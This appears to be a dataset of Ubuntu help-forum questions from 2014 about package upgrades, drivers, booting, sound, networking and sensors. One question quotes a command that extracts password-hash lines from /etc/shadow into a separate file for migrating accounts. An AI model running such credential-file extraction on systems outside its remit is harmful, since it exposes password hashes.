491238	[ k ] ubuntu in flux , upgrade would suppress kmail , konqueror and other packages ?	i got a notification of available updates today ( 20140703 ) , and as usual i checked the contents with apt-get -s upgrade ( not as root as a double security ) : note : this is only a simulation ! apt-get needs root privileges for real execution . keep also in mind that locking is deactivated , so do n't depend on the relevance to the real current situation ! reading package lists ... building dependency tree ... reading state information ... the following package was automatically installed and is no longer required : libgps21 use 'apt-get autoremove ' to remove it . the following packages have been kept back : akonadiconsole akregator ark baloo cantor cantor-backend-kalgebra cantor-backend-maxima cantor-backend-octave cantor-backend-python cantor-backend-r cantor-backend-scilab dolphin grub-common grub-pc grub-pc-bin grub2-common kaddressbook kate katepart kde-baseapps-bin kde-baseapps-data kde-config-pimactivity kde-runtime kdepasswd kdepim-kresources kdepim-runtime kdepim-runtime-dbg kdepimlibs-dbg kdepimlibs-kio-plugins kdepimlibs5-dev kfind kgpg kmail kmix knotes konqueror konqueror-nsplugins konsole kontact korganizer kwalletmanager libakonadi-calendar4 libakonadi-contact4 libakonadi-kabc4 libakonadi-kcal4 libakonadi-kde4 libakonadi-kmime4 libakonadi-notes4 libakonadi-socialutils4 libakonadi-xml4 libastro-dev libastro1 libbaloocore4 libbaloofiles4 libbaloopim4 libbalooxapian4 libcalendarsupport4 libeventviews4 libgpgme++2 libincidenceeditorsng4 libkabc4 libkactivities-bin libkactivities-dev libkactivities-models1 libkactivities6 libkalarmcal2 libkasten2controllers2abi1 libkasten2core2 libkasten2gui2 libkasten2okteta1controllers1abi1 libkasten2okteta1core1 libkasten2okteta1gui1 libkateinterfaces4 libkatepartinterfaces4 libkblog4 libkcal4 libkcalcore4 libkcalutils4 libkcompactdisc4 libkdepim4 libkdepimdbusinterfaces4 libkdgantt2-0 libkfilemetadata4 libkholidays4 libkimap4 libkldap4 libkleo4 libkmanagesieve4 libkmbox4 libkmime4 libkonq-common libkonq5abi1 libkonqsidebarplugin4a libkontactinterface4 libkpgp4 libkpimidentities4 libkpimtextedit4 libkpimutils4 libkresources4 libksieve4 libksieveui4 libktnef4 libkxmlrpcclient4 libmailcommon4 libmailimporter4 libmailtransport4 libmarble-dev libmarblewidget18 libmessagecomposer4 libmessagecore4 libmessagelist4 libmessageviewer4 libmicroblog4 libnepomukcleaner4 libnepomukcore4abi1 libnoteshared4 libokteta1core1 libokteta1gui1 libokularcore4 libpimactivity4 libpimcommon4 libqgpgme1 libsendlater4 libsyndication4 libtemplateparser4 marble marble-plugins marble-qt nepomuk-core-dev nepomuk-core-ffmpegextractor nepomuk-core-runtime okular okular-dev okular-extra-backends plasma-runners-addons plasma-scriptengine-javascript plasma-widget-folderview plasma-widget-lancelot zfs-initramfs the following packages will be upgraded : akonadi-facebook freespacenotifier gnome-settings-daemon gnome-settings-daemon-schemas kate-data kde-runtime-data kde-style-oxygen kde-wallpapers kde-wallpapers-default kde-window-manager kde-window-manager-common kde-workspace kde-workspace-bin kde-workspace-data kde-workspace-kgreet-plugins kdebase-runtime kdepim-dbg kdm khelpcenter4 kinfocenter klipper kmenuedit ksysguard ksysguardd ktimetracker libdbusmenu-glib4 libdbusmenu-gtk3-4 libdbusmenu-gtk4 libkdecorations4abi1 libkephal4abi1 libkonq5-templates libkscreensaver5 libksgrd4 libksignalplotter4 libkwineffects1abi4 libkwinglesutils1 libkwinglutils1abi3 libkworkspace4abi2 libnm-gtk-common libnm-gtk0 libnspr4 libnspr4-0d libplasma-geolocation-interface4 libplasmaclock4abi4 libplasmagenericshell4 libprocesscore4abi1 libprocessui4a libtaskmanager4abi5 libweather-ion6 nautilus-data nepomuk-core-data plasma-dataengines-addons plasma-dataengines-workspace plasma-desktop plasma-netbook plasma-scriptengine-webkit plasma-widget-kimpanel plasma-widgets-addons plasma-widgets-workspace systemsettings 60 upgraded , 0 newly installed , 0 to remove and 139 not upgraded . hmmm , the only packages being held on my system are the 4 grub packages and zfs-initramfs , completely unrelated to the remaining packages being shown as held back . or so i 'd hope , but checking on a 2nd host that does n't require specific zfs-related bootloader packages shows the same other packages being held back . worse , a apt-get -s dist-upgrade shows a number of important packages that would be removed ( presumable to be able to hold less packages back ) : the following packages will be removed : akonadiconsole kaddressbook kde-baseapps-bin kdepasswd kdepim-dbg kdepimlibs-dbg kdepimlibs5-dev kmail konqueror kubuntu-desktop libksieveui4 libmarble-dev the following packages have been kept back : grub-common grub-pc grub-pc-bin grub2-common kdepim-runtime-dbg kgpg libastro-dev libcalendarsupport4 libeventviews4 libkdgantt2-0 libkleo4 libkpgp4 libsendlater4 plasma-runners-addons plasma-scriptengine-javascript zfs-initramfs the contents of my /etc/apt/sources.list : deb http : //fr.archive.ubuntu.com/ubuntu/ trusty main restricted deb-src http : //fr.archive.ubuntu.com/ubuntu/ trusty restricted multiverse universe main # added by software-properties deb http : //fr.archive.ubuntu.com/ubuntu/ trusty-updates main restricted deb-src http : //fr.archive.ubuntu.com/ubuntu/ trusty-updates restricted multiverse universe main # added by software-properties deb http : //fr.archive.ubuntu.com/ubuntu/ trusty universe deb http : //fr.archive.ubuntu.com/ubuntu/ trusty-updates universe deb http : //fr.archive.ubuntu.com/ubuntu/ trusty multiverse deb http : //fr.archive.ubuntu.com/ubuntu/ trusty-updates multiverse deb http : //fr.archive.ubuntu.com/ubuntu/ trusty-backports main restricted universe multiverse deb-src http : //fr.archive.ubuntu.com/ubuntu/ trusty-backports main restricted universe multiverse # added by software-properties deb http : //security.ubuntu.com/ubuntu trusty-security main restricted deb-src http : //security.ubuntu.com/ubuntu trusty-security restricted multiverse universe main # added by software-properties deb http : //security.ubuntu.com/ubuntu trusty-security universe deb http : //security.ubuntu.com/ubuntu trusty-security multiverse deb http : //archive.canonical.com/ubuntu trusty partner deb-src http : //archive.canonical.com/ubuntu trusty partner deb http : //extras.ubuntu.com/ubuntu trusty main deb-src http : //extras.ubuntu.com/ubuntu trusty main what 's going on here ? are the repositories `` in flux '' , and will additional updated packages corresponding to those being held back appear in the coming hours ?
491246	epson xp-212 does not print	i 've been trying to get an epson expression home xp-212 printer/scanner working on ubuntu 12.04 . from epson 's website i have downloaded and installed the following drivers : epson-inkjet-printer-escpr_1.4.0-1lsb3.2_i386.deb iscan_2.29.3-1~usb0.1.ltdl7_i386.deb iscan-data_1.29.0-2_all.deb iscan-network-nt_1.1.1-1_i386.deb . scanning works fine but printing is the problem . when i 'm trying to print a ubuntu test page , for instance , the result is nothing but a column of letters 'm ' etc on the left side of the paper . when trying to print any other file , the paper just flows through the device without any printings . because scanning works well , it seems to me that there is a problem with the printer driver although it should be correct . thanks for any help .
491247	lost my windows 7 partition	i 've installed ubuntu 14.04 alongside windowws 7 . i had like 3 partitions ( windows 7 , data files and ubuntu 14.04 ) i 'm so sad because i had hundreds of important files in my data partition . yesterday , i was able to reach my files in the launching column , but after i 've done a recovery process , i encounterd the aforementioned problem . note that i 'm still a beginner in linux world
491250	password for software updater on xubuntu-desktop	i installed xubuntu-desktop on an aws instance of ubuntu 14.04 sudo apt-get install xubuntu-desktop xfce4 firefox nano -y -- force-yes i am logged in as ubuntu , i think this is the administrator and it had no password but the software updater looks for a password when i launch it . { ca n't post picture as my reputation is too low , first post ! } i tried changing the sudo password but that did n't work either - > sudo passwd anyone know what i should do ? do i need to create user and then login as the users ?
491254	ubuntu server network setup	my first question was closed , called a rant . yes maybe it was not clear enough and i did n't check back in time . problem i have too often is setup sets up network during install but on first boot wi-fi is gone and needs a manual setup which is a headache at times . i 'm using a wi-fi card most times i have the issue but it sets up fine during install so why is the settings lost . also after manual setup i 've problems with the card not being able to wake up and takes a few tweaks to get going . it seems to be common enough reading through various blogs , if install can set it up should it not be setup on first boot or at least what causes it not too be on some installs . this is not a rant but a genuine query and aimed at helping others with similar problems and keeping ubuntu user friendly aimed at keeping users . thanks for your time , it 's a great job being done here .
491257	how to open a bash script in terminator using a command line ?	so basically i have a program called terminator and i want to open a .sh script , however , i do n't run to run it as root , i basically want to have terminator run the script , using another command line , how can i do this ?
491262	how to add fonts	i downloaded greek and hebrew fonts to add them to libre office but after many attempts i do not manage to get them installed . i do it via nautilus and after adding the fonts in a map within truetype and run sudo fc-cache in the terminal but no fonts in office.what is the right method ?
491263	installing rtl8812au_linux_v4.2.0_6952.20130315.tar.gz	hi while trying to get the drivers for my `` edimax ac600 dual-band high gain wi-fi usb adapter '' i run into the following problem : after sudo apt-get install build-essential and cd /home/ '' username '' i try to tar vxzf rtl8812au_linux_v4.2.0_6952.20130315.tar.gz but i get : tar ( child ) : rtl8812au_linux_v4.2.0_6952.20130315.tar.gz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now as result i ca n't find the folder where it is supossed to be , the sudo apt-get does n't show me where it put it . i am running xubuntu and i 'm totally new to it , borrowed that laptop a week ago for my travels . thank your for you attention
491266	ntop-ng unable to login into webui ?	i installed latest version of ntop-ng using following repository : http : //www.nmon.net/apt-stable/ by the following command in ubuntu 14.04 : apt-get install ntopng ntopng-data now i am unable to login into the webui using default admin/admin credentials . i tried adding new user using redis also but it did not helped . no error is displayed but the page simply refreshes after clicking on login button . in cli i see the follwoing line : '' user changed to nobody '' can this be the issue ? please help me to login into ntop-ng .
491268	installing 3 operating systems	i would like to install ubuntu , lubuntu and edubuntu all as if i were dual-booting , except i suppose it would become tri-booting . how should i go about doing this ? are there any special steps involved other than simply installing them ? i install them via usb , by the way . i have also just tried dual-booting and ubuntu , lubuntu and edubuntu all wo n't detect each other when i get to the installation type screen in the installation
491269	install k9copy reloaded on ubuntu 14.04	can someone explain to me how to install k9copy reloaded on ubuntu 14:04 ? k9copy-reloaded
491272	unable to load package manamge and ubuntu software center	i am unable to open ubuntu software center and package manager.i am getting the above error.anyone please help me to get out from this .
491275	ubuntu 14.04 - sensors with bumblebee	i installed ubuntu last week and since i have two graphic cards in my notebook ( nvidia geforce 5400 and intel integrated ) i installed bumblebee to switch between them . the only problem is that since i installed bumblebee my graphic cards sensors do not show up in lm-sensors . i was expecting to have two gpu temperatures when i type sensors , one for each graphic card , and even executing sensors-detect nothing seems to happen . this is what appears when i run sensors : acpitz-virtual-0 adapter : virtual device temp1 : +54.0°c ( crit = +98.0°c ) temp2 : +54.0°c ( crit = +98.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +55.0°c ( high = +86.0°c , crit = +100.0°c ) core 0 : +55.0°c ( high = +86.0°c , crit = +100.0°c ) core 1 : +54.0°c ( high = +86.0°c , crit = +100.0°c ) core 2 : +56.0°c ( high = +86.0°c , crit = +100.0°c ) core 3 : +53.0°c ( high = +86.0°c , crit = +100.0°c ) hope someone can help me , my notebook keeps turning off and im pretty sure the integrated graphic card is overheating . thanks
491276	can not boot ubuntu 14.04 64 bit via live usb	it takes forever to boot , does n't get past the loading ( bootsplash ) screen . i tried few different usb drives and different live usb creator ( rufus , unetbootin , pendrivelinux ) more info - processor - intel i5 iso image - ubuntu-14.04-desktop-amd64.iso laptop - dell 3521
491282	ubuntu 14.04 does not detect my battery to start	ubuntu 14.04 does not detect battery to start . my laptop is an acer extensa 5630z intel pentim dual cpu t3400 2.16 ghz x 2 . 32 bits i have unity active . i have daemon.plugins.power org.gnome.settings-active true the directory /proc/acpi/battery does n't exist . no result for : $ dmesg | grep battery it does not show anything at all how can i fix this ?
491283	need help with moving windows csv into kaddress	i would like to move my contacts into a good contact manager . since i 'm a total newbie in ubuntu i 'm having problems with the importing process to kaddress . my computer finds the cvs file on my usb stick then asks me to identify at least one column . since my knowledge base is so small i am lost at that point . is there another contact manager that would be easier for the person fleeing xp that would be better for me or what do i need to do to be successful ?
491284	wget does not download all the files , and links are n't converted	i tried wget -pk http : //www.bbc.com/news/ to download this news site and store a local copy . -p is used to save all the files in order to view the website locally . -k converts the links so that they should point to the local file . but when i open the local html file of that website , and i do a right click on the displayed images ... the image file on www.bbc.com is opened . how can i solve this ?
491286	ubuntu 14.04 inkscape problem	in terminal : nebojsa @ nebojsadesktop : ~ $ inkscape the program 'inkscape ' is currently not installed . you can install it by typing : sudo apt-get install inkscape and then : nebojsa @ nebojsadesktop : ~ $ sudo apt-get install inkscape [ sudo ] password for nebojsa : reading package lists ... done building dependency tree reading state information ... done inkscape is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . inkscape wont run , any one know what is the problem ?
491287	phone not recognised in android developer tools ( adt ) on ubuntu 14.04	when i try to run my app on my htc desire c , this window comes up : i have no idea why it does n't find my phone . it does if i run adt as root , but i do n't like doing that because the ownership of the files changes to root and i have to run chown -r on them all ( which takes ages ) to get them back . any idea how i can fix this ?
491288	edit : audio inputs and outputs not displaying	i asked this question in a previous thread , but nobody responded so i 'll try again . my volume is permanently set on one setting . i can not mute it by my hotkeys . i can manually adjust it in my gnome alsa mixer , but i no longer have sound graphic in my system settings . i ca n't seem to find the traditional sound icon or get to those settings . i 've tried numerous different solutions such gsettings reset , reinstalling pulseaudio and alsamixer . none of these have worked . help ? i am running ubuntu 14.04 , soundcard is nvidia 1.2.20 and intel display audio . my graphics card is nvidia geforce gtx 670m , and i am running this all on a toshiba qosmio x875 . edit : i have fixed the problem of sound settings not being displayed . however , i have now run into the problem of my audio inputs and outputs not being displayed in my sound settings . any suggestions to fix this ?
491291	mrtg using script to grab data of sensors	i 'm using mrtg to grab data from sensors of a ubuntu server 12.04 , with this script . # ! /bin/bash sensors=/usr/bin/sensors uptime= $ ( uptime | awk -f , ' { print $ 3 } ' ) text= '' graphic card temperature '' gpctemp1= $ ( $ { sensors } | grep `` temp1 '' | awk ' { print int ( $ 3 ) } ' ) # http : //people.ee.ethz.ch/~oetiker/webtools/mrtg/reference.html # `` the external command must return 4 lines of output : # line 1 # current state of the first variable , normally 'incoming bytes count' # line 2 # current state of the second variable , normally 'outgoing bytes count' # line 3 # string ( in any human readable format ) , telling the uptime of the target . # line 4 # string , telling the name of the target. `` echo $ { gpctemp1 } echo $ { gpctemp1 } echo $ { uptime } echo $ { text } unfortunally there is two `` temp1 '' when i run sensors there is two sensors with the name `` temp1 '' /etc/mrtg/cfg/mrtg-scripts $ sensors adt7490-i2c-0-2e adapter : smbus i801 adapter at f000 in0 : +1.12 v ( min = +0.00 v , max = +3.31 v ) vcore : +1.09 v ( min = +0.00 v , max = +2.99 v ) +3.3v : +3.25 v ( min = +2.96 v , max = +3.61 v ) +5v : +5.03 v ( min = +4.48 v , max = +5.50 v ) +12v : +11.90 v ( min = +0.00 v , max = +15.69 v ) in5 : +2.10 v ( min = +0.00 v , max = +4.48 v ) fan1 : 1312 rpm ( min = 0 rpm ) fan2 : 0 rpm ( min = 0 rpm ) fan3 : 0 rpm ( min = 0 rpm ) fan4 : 0 rpm ( min = 0 rpm ) temp1 : +38.5°c ( low = +5.0°c , high = +65.0°c ) ( crit = +70.0°c , hyst = +66.0°c ) m/b temp : +39.8°c ( low = +5.0°c , high = +65.0°c ) ( crit = +70.0°c , hyst = +66.0°c ) temp3 : +42.2°c ( low = +5.0°c , high = +65.0°c ) ( crit = +70.0°c , hyst = +66.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +59.0°c ( high = +74.0°c , crit = +100.0°c ) core 1 : +55.0°c ( high = +74.0°c , crit = +100.0°c ) core 2 : +55.0°c ( high = +74.0°c , crit = +100.0°c ) core 3 : +57.0°c ( high = +74.0°c , crit = +100.0°c ) radeon-pci-0100 adapter : pci adapter temp1 : +60.5°c i want to grab the information of the radeon-pci-0100 , but how can i do that ? this is the result when i use sensors with grep /etc/mrtg/cfg/mrtg-scripts $ sensors | grep `` temp1 '' temp1 : +38.8°c ( low = +5.0°c , high = +65.0°c ) temp1 : +60.5°c
491292	`` general error . general input/output error '' when opening documents with libreoffice	i 'm running libreoffice 4.2.5.2 on ubuntu 14.04 . trying to open any document ( at first only with large ones , but now all of them ) returns either of the messages below : '' general error . general input/output error '' opening documents with libreoffice or '' locked for editing by unknown user '' or '' the file is corrupt , should libreoffice repair it ? '' libreoffice 4.1.6 , which came with the distribution upgrade , had the same bug . deleting the lock files ( which i tried ) does not fix it . sending the `` corrupt '' files to my email , i can preview their contents without problems . i use libreoffice only on linux . i 'm clueless ...
491294	before.rules date	i ca n't figure out why one of my before rules file has a date that is in the future . today 's date is july 3rd but the file time stamp states jul 6 . below is the output from ls -l in the /etc/ufw directory ( bottom one ) . is this something that is supposed to be this way for a specific reason ? i do n't know if something is screwed up . my time and date settings are correct . thanks a bunch . /etc/ufw $ ls -l total 92 -rw-r -- -- - 1 root root 913 jun 19 13:56 after6.rules -rw-r -- -- - 1 root root 913 apr 5 2012 after6.rules.20140331_213832 -rw-r -- -- - 1 root root 913 mar 31 21:42 after6.rules.20140331_214732 -rw-r -- -- - 1 root root 913 mar 31 21:48 after6.rules.20140427_143429 -rw-r -- -- - 1 root root 913 apr 27 14:35 after6.rules.20140430_185510 -rw-r -- -- - 1 root root 1004 jun 19 13:56 after.rules -rw-r -- -- - 1 root root 1004 apr 5 2012 after.rules.20140331_213832 -rw-r -- -- - 1 root root 1004 mar 31 21:42 after.rules.20140331_214732 -rw-r -- -- - 1 root root 1004 mar 31 21:48 after.rules.20140427_143429 -rw-r -- -- - 1 root root 1004 apr 27 14:35 after.rules.20140430_185510 drwxr-xr-x 2 root root 4096 may 27 13:25 applications.d -rw-r -- -- - 1 root root 2718 apr 30 18:55 before6.rules -rw-r -- -- - 1 root root 2718 apr 5 2012 before6.rules.20140331_213832 -rw-r -- -- - 1 root root 2718 mar 31 21:38 before6.rules.20140331_214732 -rw-r -- -- - 1 root root 2718 mar 31 21:47 before6.rules.20140427_143429 -rw-r -- -- - 1 root root 2718 apr 27 14:34 before6.rules.20140430_185510 -rw-r -- -- - 1 root root 2187 jul 6 2014 before.rules
491295	windows 7 and ubuntu dual boot .	i am new to ubuntu and linux . i have windows 7 on my pc . i plan on doing a dual boot with ubuntu 14.04 lts . according to what i have read so far , by simply following the instructions on the ubuntu prompts , the system will do the dual boot for me if i click the `` install ubuntu alongside windows 7 '' option . is this true ? does this option properly partition my hard drive to where windows 7 and ubuntu will run properly ? also , should i place the flash drive with ubuntu installed on it in my pc before i shut my computer off and then reboot , or shut the computer off and then place the flash drive in the system ? thanks for your time and answers . they are well appreciated .
491297	14.04 permanent windows share mounting	as this is a very basic topic , i have read many documentation about it online and none of them seems to work , i have tried several ways but i want to know if anybody has been successful with this so far . so here 's my fstab entry : //aaaaaa/bbbbbb/ccccc /backup cifs iocharset=utf8 , credentials=/home/xxxxx/.smbcredentials 0 0 i 'm getting : mount error ( 5 ) : input/output error refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) and i am sure the credentials are correct because when i change it i get a permission error . again , i have tried several changes including sec=ntlm , gid etc but did n't solve it for me .
491301	realtek alc 3661	i have a 2014 alienware laptop and want to install kubuntu on my secondary hdd . everything is working perfectly , except for the sound . i tried everything , but i ca n't get the internal speakers to work , the headphone outputs are working perfectly . everything shows up nicely , but also changig the profile as well as trying every output did n't help . as far as i can tell , the model of my sound chip is the alc3661 ( that 's what it 's called on dell 's drivers page ) . i use kubuntu 14.04 lts . please help me .
491302	installed more ram /boot/efi not found ... how to fix ?	so , i just installed more ram . now i ca n't boot ( properly ) into xubuntu . when booting i 'm greeted with something along the lines of `` failed to load /boot/efi , press s to continue or press m to manually recover '' . if i press s it loads , but everything 's wonky - my wireless mouse does n't work , my extra monitor is n't automatically added , and my background reverts to the default xubuntu one ( after briefly showing my actual background ! ) the drive is partitioned , i have xubuntu , windows 8.1 ( properly set up , as far as i know.. ) and a partition for shared files between the two . in /etc/fstab it lists /boot/efi as the mountpoint for /dev/sda2 . grub also lists /dev/sda2 as the windows bootloader point . any help is appreciated , i 'll post whatever logs i can get from the recovery console at request . edit : it seems that the ram is fine , as far as i can tell . the bios is recognizing it fine , and windows is running well ( that 's what i 'm typing from now )
491303	list installed packages that are no longer installable via repository ?	this question is in reference to another question that has not been answered . when i upgraded ubuntu , all my ppas were removed ( which i 'm ok with ) . is there a way to list all the packages that no longer have a repository associated with them ?
491305	ubuntu ca n't read temperature sensors ?	edit : it 's still problematic because the names are n't very descriptive . based on past values ( from windows ) i can sort of deduce what is what , but it 's still uncertain . the problem is that the reading names are not descriptive . i 'll open a new question for that though . i 'm trying to read my temprature sensor values using xsensors and psensor , but both programs only show a single value - what i suspect to be the cpu core temperature . here 's a screenshot to illustrate : i would like to also see : gpu temperature cpu socket temperature disk drives temperatures fan speeds if possible etc - everything programs like hwmonitor can show on windows basically how can i achieve that ?
491307	dell latitude e6400 on ubuntu 14.04 not working after resume from suspend	can someone help me as i 'm facing with the following issue : after resume my dell latitude e6400 from suspend mode it is not working and get a message like my wifi connection is offline and the system is unavailable . so as a result i have to reboot the system for recovery functionality . is there a way on how to troubleshoot the issue or apply a fix ? detail regarding network interface : *-network description : wireless interface product : ultimate n wifi link 5300 vendor : intel corporation physical id : 0 bus info : pci @ 0000:0c:00.0 logical name : wlan0 version : 00 serial : 00:21:6a:95 : bc:3c width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.13.0-30-generic firmware=8.83.5.1 build 33692 ip=192.168.1.10 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:48 memory : f1ffe000-f1ffffff thank you in advance
491312	nautilus-actions not working	i 've created a nautilus action that will allow me to easily create desktop launchers . well , that 's the idea . it is n't working . the command is : path : gnome-desktop-item-edit parameters : -- create-new % u it shows up in the context menu , but does n't work when i click it . it should be working because i can type this into the terminal and it works fine . any ideas ? i 've tried removing nautilus actions then re-installing it , same problem . if i change the execute mode to display output , i get this error : gnome-desktop-item-edit : x-nautilus-desktop : /// does not have a .desktop or .directory suffix does anyone know what i 'm doing wrong ?
491313	how to run a .sh file in terminal on login	so i have a simple sh file i want to run whenever someone logs in . i tried adding it to startup applications . this did n't work . i tried editing the .desktop file for the startup application to set terminal=true . this made it open temporarily but shut it down . i tried editing .bashrc by adding the command bash /path/to/my/file.sh and it had the same effect . this seems like it should be really simple to do , even in linux , but i have tried lots of ways and had no success . i am on ubuntu 14.something .
491315	netgear wna3100	i have the latest version of ubuntu , but it will not recognize my wireless adapter ( netgear wna3100 ) . how do i get it to search for ( any ) usb device and how do i get it to use it to gain access to the internet ?
491318	can not install drivers for geforce 5600	i 'm trying to get ubuntu on a machine w/ an old video card ( nvidia geforce 5600 ) . i 'm able to get to the desktop w/ a fresh install of 14.04 but its really laggy . i 've tried the default nvidia legacy driver as well as 173 as explained here . legacy drivers boot to a black screen , 173 black screens after unity 's login . i 've also tried installing the latest nvidia drivers but they say this card is so old that it will just use the same legacy drivers that are preloaded . i tried installing 12.04 but that boots to a black screen also . the 320gb wd hdd has been scanned for bad sectors and the dvd drive and boot dvd have been replaced . its a sempron 3200 w/ 1gb ram . any ideas ?
491319	i can not browse and run the applications	my `` applications ( icon ) '' is not working . i used to browse and run the applications simply clicking on it.this time nothing appears.somebody help me , please .
491321	change default program	i know that this question was also asked here , but i have a slightly different problem . i want to open csv files using sublime instead of calc . however , sublime does not even appear to my applications , when i follow the procedure at mentioned at that answer , in order to select that as default . i am using ubuntu 14.04 desktop edition with unity . how can i do that ?
491323	ubuntu-device-flash `` can not cleanup '' on nexus prime	i wanted to try ubuntu touch on my old nexus prime . now i stuck . i have see two different outcomes , that however seem to be related . ubuntu-device-flash -- channel=stable -- device=maguro 2014/07/03 18:50:41 device is |maguro| 2014/07/03 18:50:41 flashing version 10 from stable channel and server https : //system-image.ubuntu.com to device maguro 2014/07/03 18:50:41 ubuntu-touch/stable is a channel alias to stable 2014/07/03 18:50:41 start pushing /home/nikolaj/.cache/ubuntuimages/gpg/image-master.tar.xz to device 2014/07/03 18:50:41 start pushing /home/nikolaj/.cache/ubuntuimages/ubuntu-touch/stable/maguro/version-10.tar.xz to device 2014/07/03 18:50:41 start pushing /home/nikolaj/.cache/ubuntuimages/gpg/image-signing.tar.xz to device 192.00 kb / 24.59 mb [ __________________________________ ] 0.76 % 951.81 kb/s 26s2014/07/03 18:50:41 done pushing /home/nikolaj/.cache/ubuntuimages/gpg/image-master.tar.xz to device 2014/07/03 18:50:41 done pushing /home/nikolaj/.cache/ubuntuimages/ubuntu-touch/stable/maguro/version-10.tar.xz to device 2014/07/03 18:50:41 done pushing /home/nikolaj/.cache/ubuntuimages/gpg/image-signing.tar.xz to device 24.59 mb / 24.59 mb [ ====================================== ] 100.00 % 1.55 mb/s 2014/07/03 18:50:57 start pushing /home/nikolaj/.cache/ubuntuimages/pool/device-99338fde390f64bea054b0eadc3d019de5aac0a541ecd64d496a286fa5c1e55e.tar.xz to device 2014/07/03 18:50:57 can not push /home/nikolaj/.cache/ubuntuimages/pool/device-99338fde390f64bea054b0eadc3d019de5aac0a541ecd64d496a286fa5c1e55e.tar.xz.asc to device : free space on /cache/recovery is unknown the other outcome is this one : ubuntu-device-flash -- channel=stable -- device=maguro 2014/07/03 18:27:46 device is |maguro| 2014/07/03 18:27:46 flashing version 10 from stable channel and server https : //system-image.ubuntu.com to device maguro 2014/07/03 18:27:46 ubuntu-touch/stable is a channel alias to stable 2014/07/03 18:27:46 can not cleanup /cache/recovery/ to ensure clean deploymentexit status 255 running with -- clean-cache gives me the following : 2014/07/03 18:55:03 cleaning prevously downloaded content but i still get the same results when running with the other options . any idea ?
491325	can not calibrate my monitor & laptop	i want to calibrate my laptop ( ubuntu 14.04 ) and monitor because they have slightly different colors , but the calibrate button is grayed out . why is that ? how can i fix it ?
491327	problems with the drivers , mouse and display	i have installed ubuntu 14.04 alongside windows 8 in my laptop . these are the issues i am facing after the installation : 1- i am not able to change the brightness of the screen . 2- the cursor keeps on blinking and sometimes disappear . 3- the resolution of my screen is 1368x786 but sometimes ubuntu opens in a lower resolution . 4- after installing ubuntu , during start-up its not asking to select os . it directly opens ubuntu . specs of my laptop : - lenovo ideapad z570 4gb ram 500gb hdd 2nd gen i5 nvidia 540m ( 2gb )
491331	can i upgrade from windows 7 to windows 8.1 with ubuntu 13.10 already installed ?	the title is self-explanatory . i have windows and ubuntu installed on separate partitions . currently using the grub bootloader to switch between os . if there 's any other information i need to provide let me know .
491333	differences between ufw and gufw	from what i have been able to piece together , the firewall that comes with ubuntu is iptables , which is very complicated , so an easier way to access the firewall is through ufw and gufw . ufw is accessed through commands , and gufw is a graphical interface that makes configuring the firewall easier than ufw . is this accurate ? also , what types of rules should be defined under the firewall ? are the default settings enough under a fairly secure linux system enough , or does more need to be done ? when installing gufw ( if one goes that route ) , does the repository need to be updated ( via sudo apt ) before installation via the terminal ? more generally , does sudo apt- get updates need to be run each and every time a command is run through the terminal , or is it ok to pass on updating if you have ran sudo apt , say yesterday ? thanks for all the help .
491336	search for files contain lines with many conditions	i can search for files which have a specific word by using grep grep -l `` word '' /path however what if i want to search for files which have `` word 1 '' and `` word 2 '' in a same line ? i can use : mkdir new ; for i in * do ; grep `` word 1 '' $ i > new/ $ i_new ; done then use grep -l `` word 2 '' /new but i would like to have a one line command . using egrep -w -r 'word 1|word 2 ' /path only search for lines have `` word 1 '' or `` word 2 '' . what if i have `` word 3 '' , `` word 4 '' ?
491340	how to have lightgray interface from kde to ubuntu	i want to give all my apps a light-gray interface without actually installing kde or kubuntu . i am using ubuntu 14.04 . is there a theme or something that can achieve this ?
491341	while installing anything : clearsigned file is n't valid	whenever i try to install something ( including spotify ) i get the same error : e : gpg error : http : //repository.spotify.com trusty inrelease : clearsigned file is n't valid , got 'nodata ' ( does the network require authentication ? )
491342	share connection to router from second ethernet	i read all the previous posts but i did n't find anything that fit my needs . i have a pc with xubuntu and 2 ethernet cards . with a port ( eth1 ) i have the internet connection ( static ip address ) i want to share the internet connection with the second ethernet ( eth0 ) to a router which manages his own network . i tried configuring the eth1 with manual ip and the second eth0 with manual ip too . i ca n't use the router to share the connection do you have any idea how to make a working configuration ? please tell me if you need any extra info , because it 's the first time for me in this networking field : (
491344	saving just the audio track from a remote video file , without downloading it completely	can i save just the audio track from a remote video file , without downloading it completely ?
491345	ubuntu 14.04 ca n't find network configuration during boot	each time i boot ubuntu ca n't find the network configuration . it takes an extra 2 minutes to boot and then finds it about 3 minutes after logging in . is there a way to fix this ? thanks !
491346	how do i get my sound working ?	i 've tried getting my sound working on my ubuntu 14.04 desktop , but it refuses to work . i 've looked everywhere but my sound remains off . my sound settings wo n't allow me to drag my output volume up . and my headphones do n't work . i 've tried alsamixer and pulseaudio gives me a strange error .
491350	warning image in gparted	suddenly i have got a warning symbol ( at /dev/sda2 partition ) in my gparted display . what does it mean ? what 's wrong with my hdd ? help me correct it .
491351	error when booting	recently my laptop has been unable to boot , i have been having hard drive problems over three past few weeks but i would like to know if i need a new hard drive or not . when booting i get , error : unknown filesystem entering rescue mode ... grubrescue > i have tried to fix it by following online guides , knew of wichita told me to do this , # on the grub shell do : set root= ( hd0,6 ) set prefix= ( hd0,6 ) /boot/grub insmod normal normal # boot into the system , then in the shell do sudo update-grub sudo grub-install /dev/sda this failed after insmod normal and it stated error : unknown filesystem i need some advice about if it 's a hard drive fault or if it 's fixable and if so how ?
491358	why do i get `egrep : /etc/shadow : permission denied` when running this awk command ?	does anyone know why this command : sudo awk -v limit=50000 -f : ' ( $ 3 > =limit ) & & ( $ 3 ! =65534 ) { print $ 1 } ' /etc/passwd | tee - |egrep -f - /etc/shadow > /home/bulgarini/server_transfer/shadow.sync gives the message egrep : /etc/shadow : permission denied
491359	google chrome problem with ubuntu	when i log into google chrome with my email address after shutdown , when i start back up google chrome is replaced with yahoo and something called fox find . when this happens and i do n't log into chrome and just use mozilla foxfire , i ca n't view video on facebook or yahoo . it says flash needs to be installed . i 've tried that and still can not play videos
